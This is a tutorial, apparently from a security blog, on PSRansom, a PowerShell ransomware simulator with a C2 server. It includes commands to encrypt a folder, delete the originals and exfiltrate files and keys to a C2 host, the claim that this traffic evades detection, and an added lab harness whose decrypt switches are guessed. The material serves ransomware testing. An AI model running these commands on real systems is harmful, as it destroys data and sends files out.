How to use PSRansom for ransomware security analysis
PSRansom is a PowerShell ransomware simulation tool with C2 server functionality that helps researchers simulate the encryption phase of a generic ransomware on any operating system where PowerShell is installed. With the help of the C2 server function, we can even exfiltrate files from the target device (client) over HTTP and receive the information on the server side.
Communication between the client and server is encrypted and encoded, so it cannot be detected by traffic-based auditing tools.
Tool requirements
PowerShell 4.0 or later
Tool download
You can clone the project source locally using the following command:
git clone https://github.com/JoelGMSec/PSRansom
Once the download is complete, we will have two scripts: PSRansom and C2Server. The first simulates a ransomware infection, while the second is responsible for receiving the exfiltrated files and their recovery keys.
Tool usage
The tool is very simple to use: we only need to indicate the directory to be encrypted, the IP or hostname of the C2 server, and the port on which it receives the connection.
In addition, if we want the encrypted files to be sent as well, we add the -x switch at the end of the command. When decrypting, we only need to indicate the directory and the recovery key.
Examples of tool usage
First, our test scenario is defined as follows:
1. The ransomware will run on Windows machines
2. The folder we want to encrypt is located in C:\Backup
3. The C2 server will run on Kali Linux
4. All traffic will be routed through a proxy so its details can be inspected
Next, let’s take a look at what the tool offers:
The command and control server is also very simple to use: we only need to indicate the port on which it listens for and receives the connection. Here, we are using port 80:
pwsh C2Server.ps1 + 80
Next, we will run encryption and infiltration using the following command:
.\PSRansom.ps1 -e directory -s ServerC2 -p port -x
A random key of 24 alphanumeric characters (lowercase letters, uppercase letters, and digits) is generated, the data is encrypted with AES-256, and the recovery key is sent to the C2 server.
When it is done, the original files will be deleted, leaving only the encrypted files:
The server side receives output similar to that shown in the following figure:
Now we will receive the target device’s information, recovery key, list of encrypted files, etc. on the server side:
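To make the run above repeatable in a lab, the following PowerShell harness (added here as an example; it is not part of PSRansom) builds a disposable test directory, records a SHA-256 baseline of its files, runs the encryption command from this page, and after decryption checks that every file is restored byte-for-byte. It assumes the scripts sit in the current directory, that the decrypt switches are -d and -k (the page only says "directory and recovery key"), and uses a placeholder C2 address.

```powershell
# Added lab harness (not part of PSRansom): verify the simulation round-trips data.
# Assumptions: PSRansom.ps1 is in the current directory; decryption uses -d <dir> -k <key>
# (the page only says "directory and recovery key"); C2Server.ps1 is already listening.
param(
    [string]$TestDir   = 'C:\Backup',    # directory from the test scenario
    [string]$C2Host    = '192.0.2.10',   # placeholder: Kali host running C2Server.ps1
    [int]   $C2Port    = 80,
    [int]   $FileCount = 5
)

# 1. Build a disposable corpus of random files so nothing real is ever touched.
New-Item -ItemType Directory -Path $TestDir -Force | Out-Null
$rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
1..$FileCount | ForEach-Object {
    $bytes = New-Object byte[] 4096
    $rng.GetBytes($bytes)
    [IO.File]::WriteAllBytes((Join-Path $TestDir "sample$_.bin"), $bytes)
}

# 2. Baseline: SHA-256 of every file before the simulation (Get-FileHash needs PS 4.0+).
$before = @{}
Get-ChildItem -Path $TestDir -File | ForEach-Object {
    $before[$_.Name] = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
}

# 3. Encrypt and exfiltrate exactly as described above (-x sends the files as well).
.\PSRansom.ps1 -e $TestDir -s $C2Host -p $C2Port -x

# 4. The originals should be gone: none of the baseline names should remain.
$survivors = Get-ChildItem -Path $TestDir -File | Where-Object { $before.ContainsKey($_.Name) }
"Original files still present after encryption: $($survivors.Count) (expected 0)"

# 5. Decrypt with the key reported on the C2 side and compare against the baseline.
$key = Read-Host 'Paste the recovery key reported by C2Server.ps1'
.\PSRansom.ps1 -d $TestDir -k $key    # assumed switch names, see note above

$mismatch = 0
foreach ($name in $before.Keys) {
    $path = Join-Path $TestDir $name
    if (-not (Test-Path $path) -or
        (Get-FileHash -Path $path -Algorithm SHA256).Hash -ne $before[$name]) {
        "MISMATCH: $name"
        $mismatch++
    }
}
"Round-trip check: $($before.Count - $mismatch)/$($before.Count) files restored intact"
```

Run it only against the throwaway directory it creates; the encryption step deletes the originals, exactly as the tool is designed to do.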
License Agreement
The development and distribution of this project are under the GPL-3.0 open source license.